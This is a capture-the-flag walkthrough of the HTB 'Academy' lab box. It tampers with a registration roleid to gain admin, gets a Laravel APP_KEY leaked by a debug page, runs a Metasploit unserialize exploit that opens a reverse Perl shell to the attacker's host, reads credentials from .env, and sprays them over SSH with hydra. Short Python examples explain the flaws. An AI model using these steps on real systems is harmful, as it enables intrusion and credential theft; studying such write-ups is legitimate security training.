HTB Academy

$ sudo nano /etc/hosts

#HTB 
10.10.10.215    academy.htb

$ nmap academy.htb -A -p- -T4

Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-17 07:16 EDT
Nmap scan report for academy.htb (10.10.10.215)
Host is up (0.054s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
|   256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_  256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Hack The Box Academy
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|_    HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.91%I=7%D=4/17%Time=607AC3BC%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp
SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers
SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2
SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI
SF:nvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01
SF:\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x
SF:05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"
SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000
SF:")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r
SF:(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.51 seconds

Open ports:

  • 22(tcp) – ssh (OpenSSH 8.2p1, Ubuntu 20.04)
  • 80(tcp) – http (Apache 2.4.41)
  • 33060(tcp) – mysqlx: the MySQL X Protocol port, not the classic 3306 port. The classic mysql client cannot speak to it, which is why nmap's probes only got "Invalid message" / HY000 back.

Now let's browse to http://academy.htb and brute-force its directories with dirsearch:

$ python ~/tools/dirsearch/dirsearch.py -u http://academy.htb

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10861

Error Log: /home/kali/tools/dirsearch/logs/errors-21-04-25_11-01-18.log

Target: http://academy.htb/

Output File: /home/kali/tools/dirsearch/reports/academy.htb/_21-04-25_11-01-19.txt

[11:01:19] Starting: 
[11:01:25] 403 -  276B  - /.ht_wsr.txt
[11:01:25] 403 -  276B  - /.htaccess.bak1
[11:01:25] 403 -  276B  - /.htaccess.orig
[11:01:25] 403 -  276B  - /.htaccess.sample
[11:01:25] 403 -  276B  - /.htaccess.save
[11:01:25] 403 -  276B  - /.htaccess_orig
[11:01:25] 403 -  276B  - /.htaccess_sc
[11:01:25] 403 -  276B  - /.htaccess_extra
[11:01:25] 403 -  276B  - /.htaccessBAK
[11:01:25] 403 -  276B  - /.htaccessOLD2
[11:01:25] 403 -  276B  - /.htaccessOLD
[11:01:25] 403 -  276B  - /.htm
[11:01:25] 403 -  276B  - /.html
[11:01:25] 403 -  276B  - /.htpasswd_test
[11:01:25] 403 -  276B  - /.htpasswds
[11:01:25] 403 -  276B  - /.httr-oauth
[11:01:28] 403 -  276B  - /.php
[11:01:38] 200 -    3KB - /admin.php
[11:01:50] 200 -    0B  - /config.php
[11:01:57] 302 -   54KB - /home.php  ->  login.php
[11:01:58] 301 -  311B  - /images  ->  http://academy.htb/images/
[11:01:58] 403 -  276B  - /images/
[11:01:58] 200 -    2KB - /index.php
[11:01:58] 200 -    2KB - /index.php/login/
[11:02:00] 200 -    3KB - /login.php
[11:02:09] 200 -    3KB - /register.php
[11:02:10] 403 -  276B  - /server-status
[11:02:10] 403 -  276B  - /server-status/

Task Completed

http://academy.htb/admin.php

http://academy.htb/register.php

After registering an account through register.php we can log in to the site as a normal user.

Inspecting the registration request with Burp Suite, the POST body carries a roleid field that the browser fills in for us:

uid=pep&password=pep&confirm=pep&roleid=0

What happens if we change this value when creating a new user? Modify the roleid parameter to 1 before forwarding the request:

uid=pep&password=pep&confirm=pep&roleid=1

If the server trusts whatever role the client sends, the new account is created with that role.
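To make the bug concrete, here is an added example (not code from the original writeup or from the Academy application) that models register.php two ways: one copies every submitted field into the user record, the other allow-lists the fields a self-service signup may set and assigns the role server-side. tamper() reproduces the Burp edit on the captured body. The handler names and the meaning of roleid=1 as the admin role are assumptions; the captured body is the one from the page.

```python
"""Added example, not code from the original writeup or from the Academy app.

register_vulnerable() trusts the client for every column (mass-assignment
pattern), so a hidden or extra roleid field chooses the role.
register_hardened() only takes the fields a signup may set and decides the
role on the server.  tamper() reproduces the Burp edit on the captured body.
"""
from urllib.parse import parse_qs, urlencode

CAPTURED_BODY = "uid=pep&password=pep&confirm=pep&roleid=0"  # from the page
ADMIN_ROLE = 1     # assumption: the value that makes admin.php accept the account
DEFAULT_ROLE = 0   # what the form sends for a normal user


def form_fields(body):
    """Flatten a urlencoded body to {name: value} (first value wins, blanks kept)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def tamper(body, **overrides):
    """Re-encode a captured form body with selected fields replaced (the Burp step)."""
    fields = form_fields(body)
    fields.update(overrides)
    return urlencode(fields)


def register_vulnerable(body):
    """Trusts the client for every column, so the roleid field picks the role."""
    f = form_fields(body)
    if f.get("password") != f.get("confirm"):
        raise ValueError("passwords do not match")
    return {"uid": f["uid"], "roleid": int(f.get("roleid", DEFAULT_ROLE))}


def register_hardened(body):
    """Allow-lists client fields; the role is a server decision, never a form input."""
    f = form_fields(body)
    if f.get("password") != f.get("confirm"):
        raise ValueError("passwords do not match")
    allowed = ("uid", "password")   # anything else (roleid, id, is_admin...) is dropped
    user = {k: f[k] for k in allowed}
    user["roleid"] = DEFAULT_ROLE   # promotions happen through an admin-only path
    return {"uid": user["uid"], "roleid": user["roleid"]}


if __name__ == "__main__":
    evil = tamper(CAPTURED_BODY, roleid=str(ADMIN_ROLE))
    print(evil)
    print("vulnerable:", register_vulnerable(evil))
    print("hardened:  ", register_hardened(evil))
```

The check to make when reviewing a signup handler is the same as the one the hardened version encodes: every column that carries authorization meaning (role, group, flags) must come from server-side logic, and the handler should copy request fields through an explicit allow-list rather than iterating over whatever the client posted.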

Let’s test our new user:

http://academy.htb/admin.php

After logging in as admin we can see a to-do list where only one task is pending:

  • Fix issue with dev-staging-01.academy.htb

To be able to reach it we need to add dev-staging-01.academy.htb (same IP, 10.10.10.215) to our hosts file.

http://dev-staging-01.academy.htb/

The staging site throws a Laravel exception and, because APP_DEBUG is set to true, the debug page dumps the whole environment, including the MySQL credentials:

APP_KEY             "base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="
APP_DEBUG           "true"
APP_URL             "http://localhost"
LOG_CHANNEL         "stack"
DB_CONNECTION       "mysql"
DB_HOST             "127.0.0.1"
DB_PORT             "3306"
DB_DATABASE         "homestead"
DB_USERNAME         "homestead"
DB_PASSWORD         "secret"
BROADCAST_DRIVER    "log"
CACHE_DRIVER        "file"
SESSION_DRIVER      "file"

$ mysql -h 10.10.10.215 -p 33060 -u homestead

Enter password:
ERROR 2002 (HY000): Can't connect to MySQL server on '10.10.10.215' (115)

$ mysql -h 10.10.10.215 -p 3306 -u homestead

Enter password:
ERROR 2002 (HY000): Can't connect to MySQL server on '10.10.10.215' (115)

Neither attempt connects. Note that both commands were wrong anyway: in the mysql client the port flag is an uppercase -P; a lowercase -p followed by a space means "prompt for the password" and the next argument is taken as the database name, so both attempts went to the default port 3306, which is not reachable from outside. Port 33060 speaks the X Protocol, which the classic mysql client does not understand (mysqlsh would be needed), and homestead/secret look like Laravel Homestead's stock development defaults rather than a production credential. Either way, we need another way in.

Taking into account the error message:

UnexpectedValueException thrown with message "The stream or file "/var/www/html/htb-academy-dev-01/storage/logs/laravel.log" could not be opened in append mode: failed to open stream: Permission denied"

The app name also gives us a clue:

APP_NAME "Laravel"

So the target is running Laravel (PHP framework):
https://laravel.com/

  • We don't know yet which version of the framework is installed.
  • A quick search on https://www.exploit-db.com/ gives some possible exploits.
    • Only two are verified, and one of them requires the APP_KEY, which we already have.
    • It is worth a quick try.
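Why the leaked APP_KEY is what makes this exploit possible, shown as an added example (not code from the original writeup or from Laravel): Laravel's Encrypter packs encrypted data as base64(JSON{iv, value, mac}) with mac = HMAC-SHA256(key, base64(iv) + base64(ciphertext)), and decrypt() only checks that MAC before AES-256-CBC-decrypting the value and, in 5.5.x / 5.6.x before 5.6.30 (CVE-2018-15133, the bug behind the Metasploit module above), unserializing what comes out of the X-XSRF-TOKEN header. Whoever holds APP_KEY can therefore mint payloads the application accepts. The block below re-implements that integrity layer with the key from the page. The ciphertext handed to build_payload() is a constructed placeholder: encrypting a serialized gadget chain is what the module adds on top, and is deliberately not done here.

```python
"""Added example, not code from the original writeup or from Laravel itself.

Re-implements Laravel's Encrypter integrity layer (payload layout and MAC) so the
effect of a leaked APP_KEY is visible: a payload signed with the leaked key passes
the same check the framework performs before decrypting and unserializing.
"""
import base64
import hashlib
import hmac
import json
import os

APP_KEY = "base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="  # leaked via the debug page
IV_LEN = 16  # openssl_cipher_iv_length('AES-256-CBC')


def key_bytes(app_key):
    """Laravel drops the 'base64:' prefix and base64-decodes the rest to get the raw key."""
    if app_key.startswith("base64:"):
        return base64.b64decode(app_key[len("base64:"):])
    return app_key.encode()


def laravel_mac(key, iv_b64, value_b64):
    """Encrypter::hash(): hash_hmac('sha256', $iv.$value, $key), hex-encoded."""
    return hmac.new(key, (iv_b64 + value_b64).encode(), hashlib.sha256).hexdigest()


def build_payload(key, ciphertext, iv=None):
    """Wrap ciphertext the way Encrypter::encrypt() does, signed with the given key.

    ciphertext is whatever AES-256-CBC output the caller provides; here it is a
    constructed placeholder, no gadget chain is encrypted in this example.
    """
    iv = os.urandom(IV_LEN) if iv is None else iv
    iv_b64 = base64.b64encode(iv).decode()
    value_b64 = base64.b64encode(ciphertext).decode()
    payload = {"iv": iv_b64, "value": value_b64, "mac": laravel_mac(key, iv_b64, value_b64)}
    return base64.b64encode(json.dumps(payload).encode()).decode()


def valid_payload(key, token):
    """Mirror of Encrypter::getJsonPayload(): structure check, then constant-time MAC compare.

    True means Laravel would go on to decrypt (and, on vulnerable versions, unserialize)
    the value; False means it would throw DecryptException.
    """
    try:
        payload = json.loads(base64.b64decode(token))
    except (ValueError, TypeError):
        return False
    if not isinstance(payload, dict) or not all(k in payload for k in ("iv", "value", "mac")):
        return False
    try:
        if len(base64.b64decode(payload["iv"], validate=True)) != IV_LEN:
            return False
    except (ValueError, TypeError):
        return False
    expected = laravel_mac(key, payload["iv"], payload["value"])
    return hmac.compare_digest(expected, str(payload["mac"]))


if __name__ == "__main__":
    key = key_bytes(APP_KEY)
    forged = build_payload(key, b"\x00" * 32)  # placeholder ciphertext, constructed
    print("forged token accepted with leaked key:", valid_payload(key, forged))
    print("same token checked with another key:  ", valid_payload(key_bytes("other-key"), forged))
```

The practical consequence for a defender: APP_KEY is a signing and encryption key for every cookie, session and encrypted token the application issues, so once it has been exposed (here by a debug page on a staging host) it has to be rotated, and the debug page itself is the finding, whatever framework version is running. Patching to a Laravel release that no longer unserializes the XSRF token closes this particular RCE but does not undo the key leak.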
msf6 > search laravel 

Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  exploit/unix/http/laravel_token_unserialize_exec  2018-08-07       excellent  Yes    PHP Laravel Framework token Unserialize Remote Command Execution

Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/http/laravel_token_unserialize_exec

msf6 > use 0
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(unix/http/laravel_token_unserialize_exec) > options

Module options (exploit/unix/http/laravel_token_unserialize_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   APP_KEY                     no        The base64 encoded APP_KEY string from the .env file
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Path to target webapp
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf6 exploit(unix/http/laravel_token_unserialize_exec) > set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_KEY => dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set rhost 10.10.10.215 
rhost => 10.10.10.215
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set VHOST dev-staging-01.academy.htb
VHOST => dev-staging-01.academy.htb
msf6 exploit(unix/http/laravel_token_unserialize_exec) > run

[*] Started reverse TCP handler on 10.10.14.5:4444 
[*] Command shell session 1 opened (10.10.14.5:4444 -> 10.10.10.215:49536) at 2021-04-17 12:53:07 -0400

whoami
www-data
hostname
academy
locate python
/etc/python3
/etc/python3.8
...
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@academy:/var/www/html/htb-academy-dev-01/public$ 

Now we have a shell as www-data.

Let’s do a little bit more enumeration.

www-data@academy:/home/cry0l1t3$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@academy:/home/cry0l1t3$ ls -la
ls -la
total 32
drwxr-xr-x 4 cry0l1t3 cry0l1t3 4096 Aug 12  2020 .
drwxr-xr-x 8 root     root     4096 Aug 10  2020 ..
lrwxrwxrwx 1 root     root        9 Aug 10  2020 .bash_history -> /dev/null
-rw-r--r-- 1 cry0l1t3 cry0l1t3  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 cry0l1t3 cry0l1t3 3771 Feb 25  2020 .bashrc
drwx------ 2 cry0l1t3 cry0l1t3 4096 Aug 12  2020 .cache
drwxrwxr-x 3 cry0l1t3 cry0l1t3 4096 Aug 12  2020 .local
-rw-r--r-- 1 cry0l1t3 cry0l1t3  807 Feb 25  2020 .profile
-r--r----- 1 cry0l1t3 cry0l1t3   33 Apr 17 10:04 user.txt

www-data@academy:/$ cat /etc/passwd

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
egre55:x:1000:1000:egre55:/home/egre55:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mrb3n:x:1001:1001::/home/mrb3n:/bin/sh
cry0l1t3:x:1002:1002::/home/cry0l1t3:/bin/sh
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
21y4d:x:1003:1003::/home/21y4d:/bin/sh
ch4p:x:1004:1004::/home/ch4p:/bin/sh
g0blin:x:1005:1005::/home/g0blin:/bin/sh

www-data@academy:/home$ ls

ls
21y4d ch4p cry0l1t3 egre55 g0blin mrb3n

www-data@academy:/var/www/html/academy$ ls -la

ls -la
total 280
drwxr-xr-x 12 www-data www-data   4096 Aug 13  2020 .
drwxr-xr-x  4 root     root       4096 Aug 13  2020 ..
-rw-r--r--  1 www-data www-data    706 Aug 13  2020 .env
-rw-r--r--  1 www-data www-data    651 Feb  7  2018 .env.example
-rw-r--r--  1 www-data www-data    111 Feb  7  2018 .gitattributes
-rw-r--r--  1 www-data www-data    155 Feb  7  2018 .gitignore
drwxr-xr-x  6 www-data www-data   4096 Feb  7  2018 app
-rwxr-xr-x  1 www-data www-data   1686 Feb  7  2018 artisan
drwxr-xr-x  3 www-data www-data   4096 Feb  7  2018 bootstrap
-rw-r--r--  1 www-data www-data   1512 Feb  7  2018 composer.json
-rw-r--r--  1 www-data www-data 191621 Aug  9  2020 composer.lock
drwxr-xr-x  2 www-data www-data   4096 Feb  7  2018 config
drwxr-xr-x  5 www-data www-data   4096 Feb  7  2018 database
-rw-r--r--  1 www-data www-data   1150 Feb  7  2018 package.json
-rw-r--r--  1 www-data www-data   1040 Feb  7  2018 phpunit.xml
drwxr-xr-x  4 www-data www-data   4096 Nov  9 10:13 public
-rw-r--r--  1 www-data www-data   3622 Feb  7  2018 readme.md
drwxr-xr-x  5 www-data www-data   4096 Feb  7  2018 resources
drwxr-xr-x  2 www-data www-data   4096 Feb  7  2018 routes
-rw-r--r--  1 www-data www-data    563 Feb  7  2018 server.php
drwxr-xr-x  5 www-data www-data   4096 Feb  7  2018 storage
drwxr-xr-x  4 www-data www-data   4096 Feb  7  2018 tests
drwxr-xr-x 38 www-data www-data   4096 Aug  9  2020 vendor
-rw-r--r--  1 www-data www-data    549 Feb  7  2018 webpack.mix.js

www-data@academy:/var/www/html/academy$ cat .env

cat .env
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_DEBUG=false
APP_URL=http://localhost
LOG_CHANNEL=stack

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!

BROADCAST_DRIVER=log
CACHE_DRIVER=file
SESSION_DRIVER=file
SESSION_LIFETIME=120
QUEUE_DRIVER=sync

REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379

MAIL_DRIVER=smtp
MAIL_HOST=smtp.mailtrap.io
MAIL_PORT=2525
MAIL_USERNAME=null
MAIL_PASSWORD=null
MAIL_ENCRYPTION=null

PUSHER_APP_ID=
PUSHER_APP_KEY=
PUSHER_APP_SECRET=
PUSHER_APP_CLUSTER=mt1

MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"
www-data@academy:/var/www/html/academy$ 

We've obtained the credentials of the database user dev:

dev:mySup3rP4s5w0rd!!

www-data@academy:/var/www/html/academy$ mysql -h 127.0.0.1 -u dev

mysql -h 127.0.0.1 -u dev
ERROR 1045 (28000): Access denied for user 'dev'@'localhost' (using password: NO)

That attempt failed because no password was supplied (there is no -p), so it says nothing about the credential itself; the more useful question is whether mySup3rP4s5w0rd!! has been reused for a system account.

Since SSH is open, we can use hydra with a users.txt holding the login-capable accounts from /etc/passwd and a password.txt holding this single password:

$ hydra -L users.txt -P password.txt 10.10.10.215 -t 4 ssh

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-18 06:04:05
[DATA] max 4 tasks per 1 server, overall 4 tasks, 8 login tries (l:8/p:1), ~2 tries per task
[DATA] attacking ssh://10.10.10.215:22/
[22][ssh] host: 10.10.10.215   login: cry0l1t3   password: mySup3rP4s5w0rd!!
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-18 06:04:44

$ ssh cry0l1t3@10.10.10.215

The authenticity of host '10.10.10.215 (10.10.10.215)' can't be established.
ECDSA key fingerprint is SHA256:4v7BvR4VfuEwrmXljKvXmF+JjLCgP/46G78oNEHzt2c.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.215' (ECDSA) to the list of known hosts.
cry0l1t3@10.10.10.215's password: 
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-52-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 18 Apr 2021 10:37:11 AM UTC

  System load:             0.0
  Usage of /:              38.5% of 13.72GB
  Memory usage:            18%
  Swap usage:              0%
  Processes:               232
  Users logged in:         0
  IPv4 address for ens160: 10.10.10.215
  IPv6 address for ens160: dead:beef::250:56ff:feb9:7034

89 updates can be installed immediately.
42 of these updates are security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Wed Aug 12 21:58:45 2020 from 10.10.14.2

$ whoami

cry0l1t3

More enumeration now as cry0l1t3.

$ bash
cry0l1t3@academy:~$ cat user.txt

2234XXXXXXXXXXXXXXXXXXXXXXXXXXXX

cry0l1t3@academy:~$ whoami

cry0l1t3

cry0l1t3@academy:~$ id

uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)
  • cry0l1t3 is a member of the adm group.
    • What is the adm group?

adm: Group adm is used for system monitoring tasks. Members of this group can read many log files in /var/log, and can use xconsole. Historically, /var/log was /usr/adm (and later /var/adm), thus the name of the group.

cry0l1t3@academy:/var/log$ ls -la

total 2380
drwxrwxr-x  12 root      syslog            4096 Apr 18 14:50 .
drwxr-xr-x  14 root      root              4096 Aug  7  2020 ..
-rw-r--r--   1 root      root                 0 Nov  6 09:52 alternatives.log
-rw-r--r--   1 root      root              1103 Nov  5 12:55 alternatives.log.1
-rw-r--r--   1 root      root               366 Sep 14  2020 alternatives.log.2.gz
-rw-r--r--   1 root      root              2472 Aug  7  2020 alternatives.log.3.gz
drwxr-x---   2 root      adm               4096 Apr 18 14:50 apache2
drwxr-xr-x   2 root      root              4096 Apr 18 14:50 apt
drwxr-x---   2 root      adm               4096 Nov  9 10:11 audit
-rw-r-----   1 syslog    adm               4479 Apr 18 15:27 auth.log
-rw-r-----   1 syslog    adm               2376 Apr 18 14:50 auth.log.1
-rw-r-----   1 syslog    adm               1389 Feb  9 14:19 auth.log.2.gz
-rw-r-----   1 syslog    adm                564 Nov  5 11:37 auth.log.3.gz
-rw-r-----   1 syslog    adm              11423 Oct 21 09:46 auth.log.4.gz
-rw-r--r--   1 root      root            104003 Apr 23  2020 bootstrap.log
-rw-rw----   1 root      utmp                 0 Apr 18 14:50 btmp
-rw-rw----   1 root      utmp                 0 Feb  9 14:19 btmp.1
-rw-r--r--   1 syslog    adm             149110 Aug  7  2020 cloud-init.log
-rw-r--r--   1 root      root              7227 Aug  7  2020 cloud-init-output.log
drwxr-xr-x   2 root      root              4096 Apr  8  2020 dist-upgrade
-rw-r--r--   1 root      adm             105312 Apr 18 14:50 dmesg
-rw-r--r--   1 root      adm              98773 Feb  9 14:20 dmesg.0
-rw-r--r--   1 root      adm              20753 Nov  9 10:11 dmesg.1.gz
-rw-r--r--   1 root      adm              20664 Nov  6 09:52 dmesg.2.gz
-rw-r--r--   1 root      adm              20570 Nov  5 14:17 dmesg.3.gz
-rw-r--r--   1 root      adm              20493 Nov  5 11:37 dmesg.4.gz
-rw-r--r--   1 root      root                 0 Apr 18 14:50 dpkg.log
-rw-r--r--   1 root      root              2261 Feb  9 14:25 dpkg.log.1
-rw-r--r--   1 root      root              6837 Nov  5 12:55 dpkg.log.2.gz
-rw-r--r--   1 root      root              3615 Sep 14  2020 dpkg.log.3.gz
-rw-r--r--   1 root      root             38175 Aug 12  2020 dpkg.log.4.gz
-rw-r--r--   1 root      root             32192 Aug 10  2020 faillog
drwxr-xr-x   3 root      root              4096 Feb 10 13:11 installer
drwxr-sr-x+  3 root      systemd-journal   4096 Aug  7  2020 journal
-rw-r-----   1 syslog    adm                195 Apr 18 14:50 kern.log
-rw-r-----   1 syslog    adm             130597 Apr 18 14:50 kern.log.1
-rw-r-----   1 syslog    adm              79645 Feb  9 14:19 kern.log.2.gz
-rw-r-----   1 syslog    adm              39825 Nov  5 11:37 kern.log.3.gz
-rw-r-----   1 syslog    adm              97930 Oct 21 09:46 kern.log.4.gz
drwxr-xr-x   2 landscape landscape         4096 Aug  7  2020 landscape
-rw-rw-r--   1 root      utmp            293752 Apr 18 15:07 lastlog
drwxr-x---   2 mysql     adm               4096 Apr 18 14:50 mysql
drwx------   2 root      root              4096 Apr 23  2020 private
-rw-r-----   1 syslog    adm             165830 Apr 18 15:29 syslog
-rw-r-----   1 syslog    adm             196942 Apr 18 14:50 syslog.1
-rw-r-----   1 syslog    adm              28509 Feb  9 14:19 syslog.2.gz
-rw-r-----   1 syslog    adm              29882 Nov  9 10:11 syslog.3.gz
-rw-r-----   1 syslog    adm              77736 Nov  6 09:52 syslog.4.gz
-rw-r-----   1 syslog    adm              56682 Nov  5 11:37 syslog.5.gz
